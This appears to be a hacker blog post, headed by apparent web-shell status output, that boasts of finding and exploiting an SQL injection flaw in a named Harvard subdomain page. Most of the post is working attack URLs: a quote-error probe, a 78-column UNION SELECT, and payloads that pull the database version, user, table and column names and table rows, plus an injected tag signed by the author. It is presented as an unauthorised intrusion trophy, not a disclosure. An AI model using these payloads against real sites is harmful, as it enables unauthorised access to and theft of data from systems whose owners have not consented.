Uname
User
Php
Hdd
Chating
 :Linux p3nlhg416.shr.prod.phx3.secureserver.net 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
:666 ( sohai_666 ) Group: 666 ( ? )
:5.2.17 Safe mode: ON [ phpinfo ] Datetime: 2012-09-08 01:17:15
:10000.00 GB Free: 2802.46 GB (28%) GB
:sohai


asc.harvard.edu "bugs sqli"

data:image/jpeg;base64,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
Everyone knows about the Harvard University,or we can acces in http://www.harvard.edu

But this web have subdomain asc . . . i had found this hole in POC with SQLI
This bugs in details.php

let me check in
 
http://asc.harvard.edu/vguide/details.php?agascid='21

Star query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''21' at line 1

so i try to find the magic number

http://asc.harvard.edu/vguide/details.php?agascid=-21-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12?,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3?9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,?66,67,68,69,70,71,72,73,74,75,76,77,78--

see got it and there's had many magic number i test in 3 nummbers

check some version ,database, and user

http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,concat(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78--

and

http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+information_schema.tables+where+table_schema=database()--


and

http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from information_schema.columns+where+table_name=0x6f62736964--

http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,concat_ws(0x3a,obs_obi_id,obsid,obi,agascid,comment,mag_plot_filename,obs_data_filename,target,ccd_set_point,ydith_period,zdith_period,obsdate,obslength,0x3c63656e7465723e3c683e5445535420627920736f6861693c2f683e3c2f63656e7465723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+obsid--

no thing special in there :D lol
1komentar: di postingan asc.harvard.edu "bugs sqli"
 

1 komentar:

Langganan: Posting Komentar (Atom)

Source by sohai @2008